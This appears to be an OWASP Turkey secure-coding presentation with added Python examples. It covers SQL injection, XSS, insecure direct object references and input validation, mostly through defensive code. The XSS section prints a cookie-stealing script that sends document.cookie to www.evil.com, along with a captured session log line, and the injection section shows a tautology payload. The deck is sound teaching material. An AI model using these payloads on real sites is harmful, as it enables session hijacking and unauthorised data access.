SecureYourApp
OWASP-Turkey
Bünyamin Demir
Bünyamin Demir (@bunyamindemir)
– BSc, Kocaeli University, Department of Mathematics
– MSc, Kocaeli University, Institute of Science; thesis: Oracle Database Security
– Application Developer
– OWASP Turkey Chapter Leader
– Penetration Testing Specialist
• Web, Mobile, Network, SCADA, Wireless, Social Engineering, ATM, DoS/DDoS and Load Testing
• Source Code Analysis
– Trainer
• Web/Mobile Application Security Auditing
• Secure Code Development
• Database Security
OWASP
Why is OWASP Special?
• OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide
OWASP Projects
OWASP ZAP Proxy / WebScarab
Application Security Verification Standard
Application Security
Two weeks of ethical hacking
Ten man-years of development
Business Logic Flaws
Code Flaws
Security Errors
Attacker vs. Defender
Web Application Threat Surface
OWASP TOP 10
A1 - Injection
Anatomy of SQL Injection Attack
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password = 'password'
Anatomy of SQL Injection Attack
sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = 'john' AND password =
causes all rows in the users table to be returned!
Bind Parameters (PHP)
// PDO prepared statement: the SQL text is fixed, values are bound by name
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();
Parametrized Query (.NET)
SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password",
    objConnection);
// AddWithValue replaces the obsolete Parameters.Add(string, object) overload;
// the text box contents are sent as parameter values, never as SQL text
objCommand.Parameters.AddWithValue("@Name", NameTextBox.Text);
objCommand.Parameters.AddWithValue("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();
Prepare Statement (Java)
String newName = request.getParameter("newName");
String id = request.getParameter("id");
// SQL (JDBC PreparedStatement): placeholders are bound, never concatenated
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
pstmt.executeUpdate();
// HQL (Hibernate): a named parameter is bound the same way
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
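The two "Anatomy of SQL Injection Attack" slides and the bind-parameter slides that follow them, side by side in one runnable example (added here, not from the original deck; it uses Python's built-in sqlite3 and a constructed in-memory user_table):

```python
import sqlite3

# Constructed in-memory sample database (not from the original slides).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_table (username TEXT, password TEXT)")
    con.executemany("INSERT INTO user_table VALUES (?, ?)",
                    [("john", "password"), ("alice", "s3cret")])
    return con

def login_dynamic(con, username, password):
    """The slide's pattern: request values concatenated into the SQL text.
    The database cannot tell where the developer's SQL ends and the
    user's data begins."""
    sql = ("SELECT * FROM user_table WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchall()

def login_bound(con, username, password):
    """Bind parameters: the SQL text is fixed; the values travel separately
    and are only ever compared as data, quotes included."""
    sql = "SELECT * FROM user_table WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()

def dynamic_query_fails(con, username, password):
    """True when concatenation produced invalid SQL. A legitimate user with
    an apostrophe in the name is enough to break the dynamic version."""
    try:
        login_dynamic(con, username, password)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    print(login_dynamic(db, "john", "password"))     # the intended query: 1 row
    print(login_dynamic(db, "john", "' OR '1'='1"))  # tautology: every row returned
    print(login_bound(db, "john", "' OR '1'='1"))    # same input, bound: no rows
    print(dynamic_query_fails(db, "o'brien", "x"))   # True: the query itself breaks
```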
A3 - XSS
Anatomy of XSS Attack
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
Anatomy of XSS Attack
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
OWASP Java Encoder Project
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
Rich Text
OWASP HTML Sanitizer Project
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
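The same allowlist policy as the slide's HtmlPolicyBuilder (only <a>, only href, only https, rel="nofollow" forced), written here as a small Python sanitizer on top of the standard library's HTMLParser. This is an added illustration of how such a policy behaves, not the OWASP HTML Sanitizer's own code; the class and function names are my own.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

class LinkOnlyPolicy(HTMLParser):
    """Allowlist sanitizer with the slide's policy: <a> is the only element,
    href its only attribute, https the only URL protocol, and every link
    gets rel="nofollow". Anything not allowed is dropped; text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities arrive decoded
        self.out = []
        self.a_stack = []  # one flag per open <a>: was it emitted?

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return                      # not in allowlist: element dropped, text kept
        href = dict(attrs).get("href") or ""
        if urlsplit(href).scheme.lower() != "https":
            self.a_stack.append(False)  # javascript:, data:, relative ...: dropped
            return
        self.out.append('<a href="%s" rel="nofollow">' % escape(href, quote=True))
        self.a_stack.append(True)       # onclick, style, etc. are never copied

    def handle_endtag(self, tag):
        if tag == "a" and self.a_stack and self.a_stack.pop():
            self.out.append("</a>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # all text content re-encoded

def sanitize(untrusted_html):
    policy = LinkOnlyPolicy()
    policy.feed(untrusted_html)
    policy.close()
    policy.out.extend("</a>" for emitted in policy.a_stack if emitted)  # close dangling links
    return "".join(policy.out)

if __name__ == "__main__":
    # Constructed untrusted input, not from the slides
    print(sanitize('<p>Hi <a href="https://example.com" onclick="x()">site</a></p>'))
    print(sanitize('<a href="javascript:alert(1)">x</a><script>alert(1)</script>'))
```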
JQuery.Encoder
…
$(function() {
    $(".div [name=" + $.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1))) + "]");
});
…
encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS
$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
A4 – Insecure Direct Object References
• Attacker notices his acct parameter is 6065
?acct=6065
• He modifies it to a nearby number
?acct=6066
• Attacker views the victim’s account information
https://www.onlinebank.com/user?acct=6065
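The two standard defenses against the ?acct= flaw described above, as an added Python example (not from the original deck): an ownership check on every lookup, and per-session indirect references so the client never handles the real account numbers. The account data and names are constructed for the example.

```python
import secrets

# Constructed sample data (not from the original slides): account number -> record.
ACCOUNTS = {
    6065: {"owner": "attacker", "balance": 120},
    6066: {"owner": "victim", "balance": 9800},
}

class Forbidden(Exception):
    """Raised when the session user does not own the requested object."""

def view_account_direct(session_user, acct):
    """The slide's flaw: ?acct= is used as-is. Changing 6065 to 6066 returns
    the victim's record because ownership is never checked."""
    return ACCOUNTS[acct]

def view_account_checked(session_user, acct):
    """Fix 1: look the object up, then verify it belongs to the session user."""
    record = ACCOUNTS.get(acct)
    if record is None or record["owner"] != session_user:
        raise Forbidden("account %s is not owned by %s" % (acct, session_user))
    return record

class IndirectReferenceMap:
    """Fix 2: per-session indirect references. The client only ever sees
    random tokens for the objects this user may access, so there is no
    'nearby number' to modify."""
    def __init__(self, session_user):
        self.user = session_user
        self.tokens = {}
        for acct, rec in ACCOUNTS.items():
            if rec["owner"] == session_user:
                self.tokens[secrets.token_urlsafe(8)] = acct

    def resolve(self, token):
        acct = self.tokens.get(token)
        if acct is None:
            raise Forbidden("unknown reference %r for %s" % (token, self.user))
        return ACCOUNTS[acct]

if __name__ == "__main__":
    print(view_account_direct("attacker", 6066))   # victim's data is returned
    try:
        view_account_checked("attacker", 6066)
    except Forbidden as e:
        print("denied:", e)
    refs = IndirectReferenceMap("attacker")
    print(refs.tokens)                              # one opaque token, mapping to 6065 only
```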
Best way to SecureYourApp
Input Validation
Input Validation - Java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public boolean validateUsername(String username) {
    // Allowlist: 6 to 12 ASCII letters or digits, nothing else
    String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
    if (username == null) {
        return false;
    }
    Pattern p = Pattern.compile(usernamePattern);
    Matcher m = p.matcher(username);
    if (!m.matches()) {
        return false;
    }
    return true;
}

if (!validateUsername(username)) {
    // invalid username: reject the request
}
Input Validation - .NET
using System.Text.RegularExpressions;

// Allowlist: 1 to 10 characters, letters, digits, dots or whitespace only
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.\s]{1,10}$"))
{
    // the class name is not valid
}